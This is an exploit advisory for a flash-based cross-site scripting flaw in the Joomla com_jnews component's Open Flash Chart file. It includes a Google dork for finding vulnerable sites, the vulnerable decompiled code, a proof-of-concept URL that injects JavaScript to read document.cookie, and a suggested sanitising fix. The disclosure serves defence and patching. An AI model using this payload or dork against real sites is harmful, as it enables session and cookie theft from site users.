# Exploit Title: Joomla com_jnews Open Flash-Chart XSS
# Release Date: 14/05/2013
# Author: Deepankar Arora And Rafay Baloch
# Blog: http://rafayhackingarticles.net
# Vendor: www.joobi.co
# Versions Affected: 8.0.1(latest) and earlier
# Google Dork: inurl:com_jnews
Description:
The vulnerability with Open-Flash Chart is a known vulnerability, however
it is integrated with com_jnews, The get-data parameter is not sanitized.
Therefore it results in a flash based cross-site scripting.
The vulnerable code is as follows:
var _local2 = open_flash_chart_data ";
if (this.chart_parameters ["get-data"]) {
_local2 = this.chart_parameters ["get-Data"];
};
if (this.chart_parameters ["id"]) {
_local3 = this.callExternalCallback (_local2
this.chart_parameters ["id"]);
} else {
_local3 = this.callExternalCallback (_local2);
};
We can see from the code that when called, get-data parameter is directly
passed to _local2 without proper sanitization.
POC:
http://localhost/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()
Fix:
Sanitize the input.
_local2 = (this.chart_parameters ["get-Data"]).toString().replace(/[^\w]/g,
'');
The above would filter out all the special characters.
References:
http://www.wooyun.org/bugs/wooyun-2010-07265